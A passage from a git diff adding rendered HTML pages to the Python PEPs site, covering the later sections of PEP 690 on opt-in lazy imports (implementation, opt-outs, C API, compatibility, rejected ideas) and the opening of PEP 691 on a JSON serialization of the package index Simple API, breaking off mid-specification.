+

But if eggs.py simply references the name spam after importing it, that +will be enough to trigger the import of spam.py:

+
import spam
+print("imports done")
+spam
+
+
+

Now if we run python -L eggs.py, we will see the output "imports done" +printed first, then a 10 second delay, and then "spam loaded" printed after +that.

+

Of course, in real use cases (especially with lazy imports), it’s not +recommended to rely on import side effects like this to trigger real work. This +example is just to clarify the behavior of lazy imports.

+

Another way to explain the effect of lazy imports is that it is as if each lazy +import statement had instead been written inline in the source code immediately +before each use of the imported name. So one can think of lazy imports as +similar to transforming this code:

+
import foo
+
+def func1():
+    return foo.bar()
+
+def func2():
+    return foo.baz()
+
+
+

To this:

+
def func1():
+    import foo
+    return foo.bar()
+
+def func2():
+    import foo
+    return foo.baz()
+
+
+

This gives a good sense of when the import of foo will occur under lazy +imports, but lazy import is not really equivalent to this code transformation. +There are several notable differences:

+
    +
  • Unlike in the latter code, under lazy imports the name foo still does +exist in the module’s global namespace, and can be imported or referenced by +other modules that import this one. (Such references would also trigger the +import.)
  • +
  • The runtime overhead of lazy imports is much lower than the latter code; after +the first reference to the name foo which triggers the import, subsequent +references will have zero import system overhead; they are indistinguishable +from a normal name reference.
  • +
+

In a sense, lazy imports turn the import statement into just a declaration of an +imported name or names, to later be fully resolved when referenced.

+

An import in the style from foo import bar can also be made lazy. When the +import occurs, the name bar will be added to the module namespace as a lazy +import. The first reference to bar will import foo and resolve bar +to foo.bar.

+
+
+

Intended usage

+

Since lazy imports are a potentially-breaking semantic change, they should be +enabled only by the author or maintainer of a Python application, who is +prepared to thoroughly test the application under the new semantics, ensure it +behaves as expected, and opt-out any specific imports as needed (see below). +Lazy imports should not be enabled speculatively by the end user of a Python +application with any expectation of success.

+

It is the responsibility of the application developer enabling lazy imports for +their application to opt-out any library imports that turn out to need to be +eager for their application to work correctly; it is not the responsibility of +library authors to ensure that their library behaves exactly the same under lazy +imports.

+

The documentation of the feature, the -L flag, and the new importlib +APIs will be clear about the intended usage and the risks of adoption without +testing.

+
+
+

Implementation

+

Lazy imports are represented internally by a “lazy import” object. When a lazy +import occurs (say import foo or from foo import bar), the key "foo" +or "bar" is immediately added to the module namespace dictionary, but with +its value set to an internal-only “lazy import” object that preserves all the +necessary metadata to execute the import later.

+

A new boolean flag in PyDictKeysObject (dk_lazy_imports) is set to +signal that this particular dictionary may contain lazy import objects. This +flag is only used to efficiently resolve all lazy objects in “bulk” operations, +when a dictionary may contain lazy objects.

+

Anytime a key is looked up in a dictionary to extract its value, the +value is checked to see if it is a lazy import object. If so, the lazy object +is immediately resolved, the relevant imported modules executed, the lazy +import object is replaced in the dictionary (if possible) by the actual +imported value, and the resolved value is returned from the lookup function. A +dictionary could mutate as part of an import side effect while resolving a lazy +import object. In this case it is not possible to efficiently replace the key +value with the resolved object. In this case, the lazy import object will gain +a cached pointer to the resolved object. On next access that cached reference +will be returned and the lazy import object will be replaced in the dict with +the resolved value.

+

Because this is all handled internally by the dictionary implementation, lazy +import objects can never escape from the module namespace to become visible to +Python code; they are always resolved at their first reference. No stub, dummy +or thunk objects are ever visible to Python code or placed in sys.modules. +If a module is imported lazily, no entry for it will appear in sys.modules +at all until it is actually imported on first reference.

+

If two different modules (moda and modb) both contain a lazy import +foo, each module’s namespace dictionary will have an independent lazy import +object under the key "foo", delaying import of the same foo module. This +is not a problem. When there is first a reference to, say, moda.foo, the +module foo will be imported and placed in sys.modules as usual, and the +lazy object under the key moda.__dict__["foo"] will be replaced by the +actual module foo. At this point modb.__dict__["foo"] will remain a lazy +import object. When modb.foo is later referenced, it will also try to +import foo. This import will find the module already present in +sys.modules, as is normal for subsequent imports of the same module in +Python, and at this point will replace the lazy import object at +modb.__dict__["foo"] with the actual module foo.

+

There are two cases in which a lazy import object can escape a dictionary:

+
    +
  • Into another dictionary: to preserve the performance of bulk-copy operations +like dict.update() and dict.copy(), they do not check for or resolve +lazy import objects. However, if the source dict has the dk_lazy_imports +flag set that indicates it may contain lazy objects, that flag will be +passed on to the updated/copied dictionary. This still ensures that the lazy +import object can’t escape into Python code without being resolved.
  • +
  • Through the garbage collector: lazy imported objects are still Python objects +and live within the garbage collector; as such, they can be collected and seen +via e.g. gc.get_objects(). If a lazy object becomes +visible to Python code in this way, it is opaque and inert; it has no useful +methods or attributes. A repr() of it would be shown as something like: +<lazy_object 'fully.qualified.name'>.
  • +
+

When a lazy object is added to a dictionary, the flag dk_lazy_imports is set. +Once set, the flag is only cleared if all lazy import objects in the +dictionary are resolved, e.g. prior to dictionary iteration.

+

All dictionary iteration methods involving values (such as dict.items(), +dict.values(), PyDict_Next() etc.) will attempt to resolve all lazy +import objects in the dictionary prior to starting the iteration. Since only +(some) module namespace dictionaries will ever have dk_lazy_imports set, the +extra overhead of resolving all lazy import objects inside a dictionary is only +paid by those dictionaries that need it. Minimizing the overhead on normal +non-lazy dictionaries is the sole purpose of the dk_lazy_imports flag.

+

PyDict_Next will attempt to resolve all lazy import objects the first time +position 0 is accessed, and those imports could fail with exceptions. Since +PyDict_Next cannot set an exception, PyDict_Next will return 0 +immediately in this case, and any exception will be printed to stderr as an +unraisable exception.

+

For this reason, this PEP introduces PyDict_NextWithError, which works in the same way as PyDict_Next but can set an error when returning 0; callers should check PyErr_Occurred() after the call.

+

The eagerness of imports within try / except / with blocks or within +class or function bodies is handled in the compiler via a new +EAGER_IMPORT_NAME opcode that always imports eagerly. Top-level imports use +IMPORT_NAME, which may be lazy or eager depending on -L and/or +importlib.set_lazy_imports().
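Illustratively (assuming -L or set_lazy_imports() is in effect; module names hypothetical):

import foo          # compiles to IMPORT_NAME: may be lazy

try:
    import bar      # compiles to EAGER_IMPORT_NAME: always eager
finally:
    pass

def f():
    import baz      # compiles to EAGER_IMPORT_NAME: imports in function
                    # bodies are always eager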

+
+
+

Debugging

+

Debug logging from python -v will include a log entry whenever an import statement is encountered but its execution is deferred.

+

Python’s -X importtime feature for profiling import costs adapts naturally +to lazy imports; the profiled time is the time spent actually importing.

+

Although lazy import objects are not generally visible to Python code, in some +debugging cases it may be useful to check from Python code whether the value at +a given key in a given dictionary is a lazy import object, without triggering +its resolution. For this purpose, importlib.is_lazy_import() can be used:

+
from importlib import is_lazy_import

import foo

is_lazy_import(globals(), "foo")  # True when lazy imports are enabled

foo  # first reference resolves the lazy import

is_lazy_import(globals(), "foo")  # False
+
+
+

In this example, if lazy imports have been enabled, the first call to is_lazy_import will return True and the second will return False.

+
+
+

Per-module opt-out

+

Due to the backwards compatibility issues mentioned below, it may be necessary +for an application using lazy imports to force some imports to be eager.

+

In first-party code, since imports inside a try or with block are never +lazy, this can be easily accomplished:

+
try:  # force these imports to be eager
+    import foo
+    import bar
+finally:
+    pass
+
+
+

This PEP proposes to add a new importlib.eager_imports() context manager, +so the above technique can be less verbose and doesn’t require comments to +clarify its intent:

+
from importlib import eager_imports
+
+with eager_imports():
+    import foo
+    import bar
+
+
+

Since imports within context managers are always eager, the eager_imports() +context manager can just be an alias to a null context manager. The context +manager’s effect is not transitive: foo and bar will be imported +eagerly, but imports within those modules will still follow the usual laziness +rules.
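A sketch of a conforming implementation (not necessarily the one importlib would ship):

import contextlib

@contextlib.contextmanager
def eager_imports():
    # No-op by design: the compiler already makes any import statement
    # inside a `with` block eager, so merely being inside this context
    # manager is sufficient.
    yield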

+

The more difficult case can occur if an import in third-party code that can’t +easily be modified must be forced to be eager. For this purpose, +importlib.set_lazy_imports() takes a second optional keyword-only +excluding argument, which can be set to a container of module names within +which all imports will be eager:

+
from importlib import set_lazy_imports
+
+set_lazy_imports(excluding=["one.mod", "another"])
+
+
+

The effect of this is also shallow: all imports within one.mod will be eager, but imports in the modules that one.mod itself imports are unaffected.

+

The excluding parameter of set_lazy_imports() can be a container of any +kind that will be checked to see whether it contains a module name. If the +module name is contained in the object, imports within it will be eager. Thus, +arbitrary opt-out logic can be encoded in a __contains__ method:

+
import re
+from importlib import set_lazy_imports
+
+class Checker:
+    def __contains__(self, name):
+        return re.match(r"foo\.[^.]+\.logger", name)
+
+set_lazy_imports(excluding=Checker())
+
+
+

If Python is executed with the -L flag, then lazy imports will already be globally enabled, and the only effect of calling set_lazy_imports(True, excluding=...) will be to globally set the eager module names/callback. If set_lazy_imports(True) is called with no excluding argument, the exclusion list/callback will be cleared, and all eligible imports (module-level imports not in try/except/with, and not import *) will be lazy from that point forward.

+

This opt-out system is designed to maintain the possibility of local reasoning +about the laziness of an import. You only need to see the code of one module, +and the excluding argument to set_lazy_imports, if any, to know whether +a given import will be eager or lazy.

+
+
+

Testing

+

The CPython test suite will pass with lazy imports enabled (with some tests +skipped). One buildbot should run the test suite with lazy imports enabled.

+
+
+

C API

+

For authors of C extension modules, the proposed public C API is as follows:

  • C API: PyObject *PyImport_SetLazyImports(PyObject *enabled, PyObject *excluding)
    Python API: importlib.set_lazy_imports(enabled: bool = True, *, excluding: typing.Container[str] | None = None)
  • C API: int PyDict_IsLazyImport(PyObject *dict, PyObject *name)
    Python API: importlib.is_lazy_import(dict: typing.Dict[str, object], name: str) -> bool
  • C API: int PyImport_IsLazyImportsEnabled()
    Python API: importlib.is_lazy_imports_enabled() -> bool
  • C API: void PyDict_ResolveLazyImports(PyObject *dict)
    Python API: (none)
  • C API: PyDict_NextWithError()
    Python API: (none)
+
    +
  • void PyDict_ResolveLazyImports(PyObject *dict) resolves all lazy objects in a dictionary, if any. To be used prior to calling PyDict_NextWithError() or PyDict_Next().
  • +
  • PyDict_NextWithError() works the same way as PyDict_Next(), except that it propagates any errors to the caller by returning 0 and setting an exception. The caller should use PyErr_Occurred() to check for errors.
  • +
+
+
+
+

Backwards Compatibility

+

This proposal preserves full backwards compatibility when the feature is +disabled, which is the default.

+

Even when enabled, most code will continue to work normally without any observable change (other than improved startup time and memory usage). Namespace packages are not affected: they work just as they do currently, except lazily.

+

In some existing code, lazy imports could produce unexpected results and behaviors. The problems that may be seen when enabling lazy imports in an existing codebase are related to:

+
+

Import Side Effects

+

Import side effects that would otherwise be produced when an imported module is executed at the import statement will be deferred until the imported objects are used.

+

These import side effects may include:

+
    +
  • code executing any side-effecting logic during import;
  • +
  • relying on imported submodules being set as attributes in the parent module.
  • +
+

A relevant and typical affected case is the click library for building Python command-line interfaces. If e.g. cli = click.group() is defined in main.py, and sub.py imports cli from main and adds subcommands to it via decorators (@cli.command(...)), while the actual cli() call is in main.py, then lazy imports may prevent the subcommands from being registered, since Click is depending on side effects of the import of sub.py. The fix is to ensure that the import of sub.py is eager, e.g. by using the importlib.eager_imports() context manager (a sketch follows).
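A hedged sketch of the affected pattern and its fix (module layout and command names are illustrative, not prescribed by this PEP):

# app.py
import click

@click.group()
def cli():
    pass

# sub.py
import click
from app import cli

@cli.command()
def hello():
    click.echo("hello")

# main.py
from importlib import eager_imports
from app import cli

with eager_imports():
    import sub  # must run eagerly: importing sub registers its commands

if __name__ == "__main__":
    cli()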

+
+
+

Dynamic Paths

+

There could be issues related to dynamic Python import paths; particularly, +adding (and then removing after the import) paths from sys.path:

+
import sys

sys.path.insert(0, "/path/to/foo/module")
import foo      # deferred: not actually imported here
del sys.path[0]
foo.Bar()       # import happens now, after the path entry is gone
+
+
+

In this case, with lazy imports enabled, the import of foo will not actually +occur while the addition to sys.path is present.

+

An easy fix for this (which also improves the code style and ensures cleanup) +would be to place the sys.path modifications in a context manager. This +resolves the issue, since imports inside a with block are always eager.
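For example, a small helper like the following (hypothetical; not part of the stdlib) both scopes the path change and, because the import sits inside a with block, forces it to be eager:

import contextlib
import sys

@contextlib.contextmanager
def prepend_sys_path(path):
    # Temporarily put `path` at the front of sys.path.
    sys.path.insert(0, path)
    try:
        yield
    finally:
        sys.path.remove(path)

with prepend_sys_path("/path/to/foo/module"):
    import foo  # eager: imports inside a with block are never lazy

foo.Bar()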

+
+
+

Deferred Exceptions

+

Exceptions that occur during a lazy import bubble up and erase the +partially-constructed module(s) from sys.modules, just as exceptions during +normal import do.

+

Since errors raised during a lazy import will occur later than they would if +the import were eager (i.e. wherever the name is first referenced), it is also +possible that they could be accidentally caught by exception handlers that did +not expect the import to be running within their try block, leading to +confusion.
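For instance (assuming lazy imports are enabled, and that executing the hypothetical broken_module raises during import):

import broken_module  # deferred: no error raised here

def load():
    try:
        return broken_module.read()  # first reference triggers the import
    except Exception:
        # Written to handle read() failures, this handler now also
        # swallows the deferred import error.
        return None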

+
+
+
+

Drawbacks

+

Downsides of this PEP include:

+
    +
  • It provides subtly incompatible semantics for the behavior of Python imports. This is a potential burden on library authors who may be asked by their users to support both semantics, and is one more behavior for Python users/readers to be aware of.
  • +
  • Some popular Python coding patterns (notably centralized registries populated +by a decorator) rely on import side effects and may require explicit opt-out to +work as expected with lazy imports.
  • +
  • Exceptions can be raised at any point while accessing names that represent lazy imports; this could lead to confusion and to debugging of unexpected exceptions.
  • +
+

Lazy import semantics are already possible and even supported today in the Python standard library, so these drawbacks are not newly introduced by this PEP. So far, existing usage of lazy imports by some applications has not proven problematic. But this PEP could make the usage of lazy imports more popular, potentially exacerbating these drawbacks.

+

These drawbacks must be weighed against the significant benefits offered by this +PEP’s implementation of lazy imports. Ultimately these costs will be higher if +the feature is widely used; but wide usage also indicates the feature provides a +lot of value, perhaps justifying the costs.

+
+
+

Security Implications

+

Deferred execution of code could produce security concerns if the process owner, shell path, sys.path, or other sensitive environment or contextual state changes between the time the import statement is executed and the time the imported object is first referenced.

+
+
+

Performance Impact

+

The reference implementation has shown that the feature has negligible +performance impact on existing real-world codebases (Instagram Server, several +CLI programs at Meta, Jupyter notebooks used by Meta researchers), while +providing substantial improvements to startup time and memory usage.

+

The reference implementation shows no measurable change +in aggregate performance on the pyperformance benchmark suite.

+
+
+

How to Teach This

+

Since the feature is opt-in, beginners should not encounter it by default. +Documentation of the -L flag and importlib.set_lazy_imports() can +clarify the behavior of lazy imports.

+

The documentation should also clarify that opting into lazy imports is opting +into a non-standard semantics for Python imports, which could cause Python +libraries to break in unexpected ways. The responsibility to identify these +breakages and work around them with an opt-out (or stop using lazy imports) +rests entirely with the person choosing to enable lazy imports for their +application, not with the library author. Python libraries are under no +obligation to support lazy import semantics. Politely reporting an +incompatibility may be useful to the library author, but they may choose to +simply say their library does not support use with lazy imports, and this is a +valid choice.

+

Some best practices to deal with some of the issues that could arise and to +better take advantage of lazy imports are:

+
    +
  • Avoid relying on import side effects. Perhaps the most common reliance on import side effects is the registry pattern, where population of some external registry happens implicitly during the importing of modules, often via decorators. Instead, the registry should be built via an explicit call that does a discovery process to find decorated functions or classes in explicitly nominated modules (see the sketch after this list).
  • +
  • Always import needed submodules explicitly, don’t rely on some other import +to ensure a module has its submodules as attributes. That is, unless there is an +explicit from . import bar in foo/__init__.py, always do import +foo.bar; foo.bar.Baz, not import foo; foo.bar.Baz. The latter only works +(unreliably) because the attribute foo.bar is added as a side effect of +foo.bar being imported somewhere else. With lazy imports this may not always +happen in time.
  • +
  • Avoid using star imports, as those are always eager.
  • +
+
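A sketch of the explicit-registry approach mentioned in the first bullet (names hypothetical):

import importlib

REGISTRY = {}

def register(func):
    # Decorator: records func, but only runs when its module is imported.
    REGISTRY[func.__name__] = func
    return func

def build_registry(module_names):
    # Explicit discovery: import the nominated modules so their
    # decorators run, instead of relying on import side effects.
    for name in module_names:
        importlib.import_module(name)
    return REGISTRY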
+
+

Reference Implementation

+

The initial implementation is available as part of Cinder. This reference implementation +is in use within Meta and has proven to achieve improvements in startup time +(and total runtime for some applications) in the range of 40%-70%, as well as +significant reduction in memory footprint (up to 40%), thanks to not needing to +execute imports that end up being unused in the common flow.

+

An updated reference implementation based on CPython main branch is also available.

+
+
+

Rejected Ideas

+
+

Wrapping deferred exceptions

+

To reduce the potential for confusion, exceptions raised in the +course of executing a lazy import could be replaced by a LazyImportError +exception (a subclass of ImportError), with a __cause__ set to the +original exception.

+

Ensuring that all lazy import errors are raised as LazyImportError would reduce the likelihood that they would be accidentally caught and mistaken for a different expected exception. However, in practice we have seen cases, e.g. inside tests, where failing modules raise a unittest.SkipTest exception, and this too would end up being wrapped in LazyImportError, making such tests fail because the true exception type is hidden. The drawbacks here seem to outweigh the hypothetical case where unexpected deferred exceptions are caught by mistake.

+
+
+

Per-module opt-in

+

A per-module opt-in using future imports (i.e. from __future__ import lazy_imports) does not make sense, because __future__ imports are not feature flags; they are for transition to behaviors that will become the default in the future. It is not clear that lazy imports will ever make sense as the default behavior, so we should not promise this with a __future__ import.

+

There are other cases where a library might desire to locally opt-in to lazy +imports for a particular module; e.g. a lazy top-level __init__.py for a +large library, to make its subcomponents accessible as lazy attributes. For now, +to keep the feature simpler, this PEP chooses to focus on the “application” use +case and does not address the library use case. The underlying laziness +mechanism introduced in this PEP could be used in the future to address this use +case as well.

+
+
+

Explicit syntax for individual lazy imports

+

If the primary objective of lazy imports were solely to work around import +cycles and forward references, an explicitly-marked syntax for particular +targeted imports to be lazy would make a lot of sense. But in practice it would +be very hard to get robust startup time or memory use benefits from this +approach, since it would require converting most imports within your code base +(and in third-party dependencies) to use the lazy import syntax.

+

It would be possible to aim for a “shallow” laziness where only the top-level imports of subsystems from the main module are made explicitly lazy, but imports within the subsystems are all eager. This is extremely fragile, though: it only takes one misplaced import to undo the carefully constructed shallow laziness. Globally enabling lazy imports, on the other hand, provides robust laziness in depth, where you always pay only for the imports you use.

+

There may be use cases (e.g. for static typing) where individually-marked lazy +imports are desirable to avoid forward references, but the perf/memory benefits +of globally lazy imports are not needed. Since this is a different set of +motivating use cases and requires new syntax, we prefer not to include it in +this PEP. Another PEP could build on top of this implementation and propose the +additional syntax.

+
+
+

Environment variable to enable lazy imports

+

Providing an environment variable opt-in lends itself too easily to abuse of the +feature. It may seem tempting for a Python user to, for instance, globally set +the environment variable in their shell in the hopes of speeding up all the +Python programs they run. This usage with untested programs is likely to lead to +spurious bug reports and maintenance burden for the authors of those tools. To +avoid this, we choose not to provide an environment variable opt-in at all.

+
+
+

Removing the -L flag

+

We do provide the -L CLI flag, which could in theory be abused in a similar way by an end user running an individual Python program with python somescript.py or python -m somescript (rather than one distributed via Python packaging tools). But the potential scope for misuse is much less with -L than with an environment variable, and -L is valuable for some applications to maximize startup time benefits by ensuring that all imports from the start of a process will be lazy, so we choose to keep it.

+

It is already the case that running arbitrary Python programs with command line +flags they weren’t intended to be used with (e.g. -s, -S, -E, or +-I) can have unexpected and breaking results. -L is nothing new in this +regard.

+
+
+

Half-lazy imports

+

It would be possible to eagerly run the import loader to the point of finding +the module source, but then defer the actual execution of the module and +creation of the module object. The advantage of this would be that certain +classes of import errors (e.g. a simple typo in the module name) would be +caught eagerly instead of being deferred to the use of an imported name.

+

The disadvantage would be that the startup time benefits of lazy imports would +be significantly reduced, since unused imports would still require a filesystem +stat() call, at least. It would also introduce a possibly non-obvious split +between which import errors are raised eagerly and which are delayed, when +lazy imports are enabled.

+

This idea is rejected for now on the basis that in practice, confusion about +import typos has not been an observed problem with the reference +implementation. Generally delayed imports are not delayed forever, and errors +show up soon enough to be caught and fixed (unless the import is truly unused.)

+

Another possible motivation for half-lazy imports would be to allow modules themselves to control, via some flag, whether they are imported lazily or eagerly. This is rejected both because it requires half-lazy imports, giving up some of the performance benefits of import laziness, and because in general modules do not decide how or when they are imported; the module importing them decides that. There isn’t a clear rationale for this PEP to invert that control; instead, it just provides more options for the importing code to make the decision.

+
+
+

Lazy dynamic imports

+

It would be possible to add a lazy=True or similar option to __import__() and/or importlib.import_module(), to enable them to perform lazy imports. That idea is rejected in this PEP for lack of a clear use case. Dynamic imports are already far outside the PEP 8 code style recommendations for imports, and can easily be made precisely as lazy as desired by placing them at the desired point in the code flow. They are not commonly used at module top level, which is where lazy imports apply.

+
+
+

Deep eager-imports override

+

The proposed importlib.eager_imports() context manager and excluded modules +in the importlib.set_lazy_imports(excluding=...) override all have shallow +effects: they only force eagerness for the location they are applied to, not +transitively. It would be possible to provide a deep/transitive version of one +or both. That idea is rejected in this PEP because the implementation would be +complex (taking into account threads and async code), experience with the +reference implementation has not shown it to be necessary, and because it +prevents local reasoning about laziness of imports.

+

A deep override can lead to confusing behavior because the +transitively-imported modules may be imported from multiple locations, some of +which use the “deep eager override” and some of which don’t. Thus those modules +may still be imported lazily initially, if they are first imported from a +location that doesn’t have the override.

+

With deep overrides it is not possible to locally reason about whether a given +import will be lazy or eager. With the behavior specified in this PEP, such +local reasoning is possible.

+
+
+

Making lazy imports the default behavior

+

Making lazy imports the default/sole behavior of Python imports, instead of +opt-in, would have some long-term benefits, in that library authors would +(eventually) no longer need to consider the possibility of both semantics.

+

However, the backwards incompatibilities are such that this could only be considered over a long time frame, with a __future__ import. It is not at all clear that lazy imports should become the default import semantics for Python.

+

This PEP takes the position that the Python community needs more experience with +lazy imports before considering making it the default behavior, so that is +entirely left to a possible future PEP.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0690.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0691/index.html b/pep-0691/index.html new file mode 100644 index 00000000000..16b9f449702 --- /dev/null +++ b/pep-0691/index.html @@ -0,0 +1,1100 @@ PEP 691 – JSON-based Simple API for Python Package Indexes | peps.python.org
+
+


+ + +
+
+
+

PEP 691 – JSON-based Simple API for Python Package Indexes

+
+
Author:
+
Donald Stufft <donald at stufft.io>, +Pradyun Gedam <pradyunsg at gmail.com>, +Cooper Lees <me at cooperlees.com>, +Dustin Ingram <di at python.org>
+
PEP-Delegate:
+
Brett Cannon <brett at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
04-May-2022
+
Post-History:
+
05-May-2022
+
Resolution:
+
Discourse message
+
+
+
+
+
+

Abstract

+

The “Simple Repository API” that was defined in PEP 503 (and was in use much +longer than that) has served us reasonably well for a very long time. However, +the reliance on using HTML as the data exchange mechanism has several +shortcomings.

+

There are two major issues with an HTML-based API:

+
    +
  • While HTML5 is a standard, it’s an incredibly complex standard and ensuring +completely correct parsing of it involves complex logic that does not +currently exist within the Python standard library (nor the standard library +of many other languages).

    This means that to actually accept everything that is technically valid, tools +have to pull in large dependencies or they have to rely on the standard library’s +html.parser library, which is lighter weight but potentially doesn’t +fully support HTML5.

    +
  • +
  • HTML5 is primarily designed as a markup language to present documents for human +consumption. Our use of it is driven largely for historical and accidental +reasons, and it’s unlikely anyone would design an API that relied on it if +they were starting from scratch.

    The primary issue with using a markup format designed for human consumption +is that there’s not a great way to actually encode data within HTML. We’ve +gotten around this by limiting the data we put in this API and being creative +with how we can cram data into the API (for instance, hashes are embedded as +URL fragments, adding the data-yanked attribute in PEP 592).

    +
  • +
+

PEP 503 was largely an attempt to standardize what was already in use, so it +did not propose any large changes to the API.

+

In the intervening years, we’ve regularly talked about an “API V2” that would re-envision the entire API of PyPI. However, due to limited time, that effort has not gained much, if any, traction beyond people thinking that it would be nice to do.

+

This PEP attempts to take a different route. It doesn’t fundamentally change +the overall API structure, but instead specifies a new serialization of the +existing data contained in existing PEP 503 responses in a format that is +easier for software to parse rather than using a human centric document format.

+
+
+

Goals

+
    +
  • Enable zero configuration discovery. Clients of the simple API MUST be +able to gracefully determine whether a target repository supports this PEP +without relying on any form of out of band communication (configuration, prior +knowledge, etc). Individual clients MAY choose to require configuration +to enable the use of this API, however.
  • +
  • Enable clients to drop support for “legacy” HTML parsing. While it is expected +that most clients will keep supporting HTML-only repositories for a while, if not +forever, it should be possible for a client to choose to support only the new +API formats and no longer invoke an HTML parser.
  • +
  • Enable repositories to drop support for “legacy” HTML formats. Similar to +clients, it is expected that most repositories will continue to support HTML +responses for a long time, or forever. It should be possible for a repository to +choose to only support the new formats.
  • +
  • Maintain full support for existing HTML-only clients. We MUST not break existing clients that are accessing the API as a strictly PEP 503 API. The only exception to this is if the repository itself has chosen to no longer support the HTML format.
  • +
  • Minimal additional HTTP requests. Using this API MUST not drastically increase the number of HTTP requests an installer must make in order to function. Ideally it will require 0 additional requests, but if needed it may require one or two additional requests (total, not per dependency).
  • +
  • Minimal additional unique responses. Due to the nature of how large +repositories like PyPI cache responses, this PEP should not introduce a +significantly or combinatorially large number of additional unique responses +that the repository may produce.
  • +
  • Supports TUF. This PEP MUST be able to function within the bounds of +what TUF can support (PEP 458), and must be able to be secured using it.
  • +
  • Require only the standard library, or small external dependencies for clients. +Parsing an API response should ideally require nothing but the standard +library, however it would be acceptable to require a small, pure Python +dependency.
  • +
+
+
+

Specification

+

To enable response parsing with only the standard library, this PEP specifies that +all responses (besides the files themselves, and the HTML responses from +PEP 503) should be serialized using JSON.

+

To enable zero configuration discovery and to minimize the amount of additional HTTP +requests, this PEP extends PEP 503 such that all of the API endpoints (other than the +files themselves) will utilize HTTP content negotiation to allow client and server to +select the correct serialization format to serve, i.e. either HTML or JSON.

+
+

Versioning

+

Versioning will adhere to PEP 629 format (Major.Minor), which has defined the +existing HTML responses to be 1.0. Since this PEP does not introduce new features +into the API, rather it describes a different serialization format for the existing +features, this PEP does not change the existing 1.0 version, and instead just +describes how to serialize that into JSON.

+

Similar to PEP 629, the major version number MUST be incremented if any +changes to the new format would result in no longer being able to expect existing +clients to meaningfully understand the format.

+

Likewise, the minor version MUST be incremented if features are +added or removed from the format, but existing clients would be expected to continue +to meaningfully understand the format.

+

Changes that would not result in existing clients being unable to meaningfully +understand the format and which do not represent features being added or removed +may occur without changing the version number.

+

This is intentionally vague, as this PEP believes it is best left up to future PEPs +that make any changes to the API to investigate and decide whether or not that +change should increment the major or minor version.

+

Future versions of the API may add things that can only be represented in a subset +of the available serializations of that version. All serializations version numbers, +within a major version, SHOULD be kept in sync, but the specifics of how a +feature serializes into each format may differ, including whether or not that feature +is present at all.

+

It is the intent of this PEP that the API should be thought of as URL endpoints that +return data, whose interpretation is defined by the version of that data, and then +serialized into the target serialization format.

+
+
+

JSON Serialization

+

The URL structure from PEP 503 still applies, as this PEP only adds an additional +serialization format for the already existing API.

+

The following constraints apply to all JSON serialized responses described in this +PEP:

+
    +
  • All JSON responses will always be a JSON object rather than an array or other +type.
  • +
  • While JSON doesn’t natively support a URL type, any value that represents a URL in this API may be either absolute or relative, as long as it points to the correct location. If relative, it is relative to the current URL as if it were HTML.
  • +
  • Additional keys may be added to any dictionary objects in the API responses +and clients MUST ignore keys that they don’t understand.
  • +
  • All JSON responses will have a meta key, which contains information related to +the response itself, rather than the content of the response.
  • +
  • All JSON responses will have a meta.api-version key, which will be a string that +contains the PEP 629 Major.Minor version number, with the same fail/warn +semantics as defined in PEP 629.
  • +
  • All requirements of PEP 503 that are not HTML specific still apply.
  • +
+
+

Project List

+

The root URL / for this PEP (which represents the base URL) will be a JSON encoded dictionary which has two keys:

+
    +
  • projects: An array where each entry is a dictionary with a single key, name, which is the project name as a string.
  • +
  • meta: The general response metadata as described earlier.
  • +
+

As an example:

+
{
+  "meta": {
+    "api-version": "1.0"
+  },
+  "projects": [
+    {"name": "Frob"},
+    {"name": "spamspamspam"}
+  ]
+}
+
+
+
+

Note

+

The name field is the same as the one from PEP 503, which does not specify +whether it is the non-normalized display name or the normalized name. In practice +different implementations of these PEPs are choosing differently here, so relying +on it being either non-normalized or normalized is relying on an implementation +detail of the repository in question.

+
+
+

Note

+

While the projects key is an array, and thus is required to be in some kind +of an order, neither PEP 503 nor this PEP requires any specific ordering nor +that the ordering is consistent from one request to the next. Mentally this is +best thought of as a set, but both JSON and HTML lack the functionality to have +sets.

+
+
+
+

Project Detail

+

The format of this URL is /<project>/ where the <project> is replaced by the +PEP 503 normalized name for that project, so a project named “Silly_Walk” would +have a URL like /silly-walk/.
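The PEP 503 name normalization referenced here is, in code:

import re

def normalize(name: str) -> str:
    # From PEP 503: runs of -, _ and . are replaced with a single -,
    # and the result is lowercased.
    return re.sub(r"[-_.]+", "-", name).lower()

normalize("Silly_Walk")  # 'silly-walk'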

+

This URL must respond with a JSON encoded dictionary that has three keys:

+
    +
  • name: The normalized name of the project.
  • +
  • files: A list of dictionaries, each one representing an individual file.
  • +
  • meta: The general response metadata as described earlier.
  • +
+

Each individual file dictionary has the following keys:

+
    +
  • filename: The filename that is being represented.
  • +
  • url: The URL that the file can be fetched from.
  • +
  • hashes: A dictionary mapping a hash name to a hex encoded digest of the file. +Multiple hashes can be included, and it is up to the client to decide what to do +with multiple hashes (it may validate all of them or a subset of them, or nothing +at all). These hash names SHOULD always be normalized to be lowercase.

    The hashes dictionary MUST be present, even if no hashes are available +for the file, however it is HIGHLY recommended that at least one secure, +guaranteed-to-be-available hash is always included.

    +

    By default, any hash algorithm available via hashlib (specifically any that can +be passed to hashlib.new() and do not require additional parameters) can +be used as a key for the hashes dictionary. At least one secure algorithm from +hashlib.algorithms_guaranteed SHOULD always be included. At the time +of this PEP, sha256 specifically is recommended.

    +
  • +
  • requires-python: An optional key that exposes the Requires-Python +metadata field, specified in PEP 345. Where this is present, installer tools +SHOULD ignore the download when installing to a Python version that +doesn’t satisfy the requirement.

    Unlike data-requires-python in PEP 503, the requires-python key does not +require any special escaping other than anything JSON does naturally.

    +
  • +
  • dist-info-metadata: An optional key that indicates +that metadata for this file is available, via the same location as specified in +PEP 658 ({file_url}.metadata). Where this is present, it MUST be +either a boolean to indicate if the file has an associated metadata file, or a +dictionary mapping hash names to a hex encoded digest of the metadata’s hash.

    When this is a dictionary of hashes instead of a boolean, then all the same +requirements and recommendations as the hashes key hold true for this key as +well.

    +

    If this key is missing then the metadata file may or may not exist. If the key +value is truthy, then the metadata file is present, and if it is falsey then it +is not.

    +

    It is recommended that servers make the hashes of the metadata file available if +possible.

    +
  • +
  • gpg-sig: An optional key that acts as a boolean to indicate whether the file has an associated GPG signature. The URL for the signature file follows what is specified in PEP 503 ({file_url}.asc). If this key does not exist, then the signature may or may not exist.
  • +
